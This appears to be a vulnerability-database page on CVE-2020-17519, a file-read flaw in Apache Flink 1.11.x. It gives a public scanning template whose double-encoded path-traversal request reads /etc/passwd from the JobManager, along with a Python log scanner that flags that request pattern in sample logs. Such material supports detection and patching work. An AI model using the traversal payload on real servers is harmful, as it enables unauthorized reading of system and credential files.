CVE-2020-17519: Apache Flink - Local File Inclusion

Date: 2025-08-01 | Affected software: Apache Flink | PoC: public

Vulnerability description

Apache Flink 1.11.0 (as well as 1.11.1 and 1.11.2) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (also known as local file inclusion).

PoC code [public]

id: CVE-2020-17519

info:
  name: Apache Flink - Local File Inclusion
  author: pdteam
  severity: high
  description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.
  reference:
    - https://github.com/B1anda0/CVE-2020-17519
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17519
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-17519
    cwe-id: CWE-552
    epss-score: 0.94383
    epss-percentile: 0.99965
    cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: flink
  tags: cve,cve2020,apache,lfi,flink,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204856106aadde6078326ab97a094ebab3eccff5022a8283c6185d0a7fff396a4302203284b83c9e2626773e5b0dc14e38d326008a9f311c5b9cedb00072c81b1b9d6e:922c64590222798bb761d5b6d8e72950
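
A log check for the request pattern the template sends, added here as an example (it is not part of the original template or of Apache Flink). It percent-decodes the request path repeatedly so the double-encoded `%252f` is normalised, then flags `..` segments under `/jobmanager/logs/`; the access-log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# REST route the template requests; legitimate calls carry a bare log file name.
LOG_ROUTE = "/jobmanager/logs/"
# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2025:10:00:05 +0000] "GET /jobmanager/logs/..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '203.0.113.9 - - [01/Aug/2025:10:00:06 +0000] "GET /jobmanager/logs/..%2f..%2fetc%2fhosts HTTP/1.1" 404 0',
    '198.51.100.4 - - [01/Aug/2025:10:00:09 +0000] "GET /jobs/overview HTTP/1.1" 200 312',
]

def fully_decode(path, max_rounds=5):
    """Percent-decode until stable, so %252f -> %2f -> / is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_traversal(request_path):
    """True if the part after /jobmanager/logs/ decodes to a path with '..' segments."""
    path = request_path.split("?", 1)[0]
    idx = path.find(LOG_ROUTE)
    if idx == -1:
        return False
    tail = fully_decode(path[idx + len(LOG_ROUTE):]).replace("\\", "/")
    return ".." in tail.split("/")

def scan(lines):
    """Return the log lines whose request path matches the traversal pattern."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_traversal(m.group(1)):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious:", hit)
```

A flagged request that returned status 200 deserves priority review, since the template treats a 200 response with file content as confirmation.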
